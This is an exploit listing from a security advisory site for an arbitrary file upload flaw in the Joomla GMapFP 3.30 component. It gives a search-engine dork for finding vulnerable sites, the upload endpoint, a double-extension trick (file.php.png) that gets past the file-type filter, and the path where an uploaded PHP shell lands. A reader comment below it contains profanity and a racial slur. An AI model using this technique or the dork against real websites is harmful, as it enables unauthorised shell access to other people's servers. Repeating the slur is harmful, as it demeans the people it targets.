Joomla GMapFP 3.30 Arbitrary File Upload

2020.03.25
Credit: thelastvvv
Risk: High
Local: No
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-25 # Exploit Author: ThelastVvV # Vendor Homepage:https://gmapfp.org/ # Version:* Version J3.30pro # Tested on: Ubuntu # PoC: http://127.0.0.1/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image # you can bypass the the restriction by uploading your file.php.png , file2.php.jpeg , file3.html.jpg ,file3.txt.jpg # Dir File Path: http://127.0.0.1/images/gmapfp/file.php or http://127.0.0.1//images/gmapfp/file.php.png # The Joomla Gmapfp Components 3.x is allowing # remote attackers to upload arbitrary files upload/shell upload due the issues of unrestricted file uploads


Vote for this issue:
18%
82%

Comment it here.
Emlik | Date: 2020-03-26 20:40 CET+1
Dork works but the stated PoC doesnt.
sm3lu | Date: 2020-04-04 21:01 CET+1
this shit work only in the pro version of 3.30 2014 spend 2 hours of search just find the 3.30 3.35 3.4 up versions all has been updated maybe 6 years ago nigga u will be lucky to find something to test

Copyright 2025, cxsecurity.com

 

Back to Top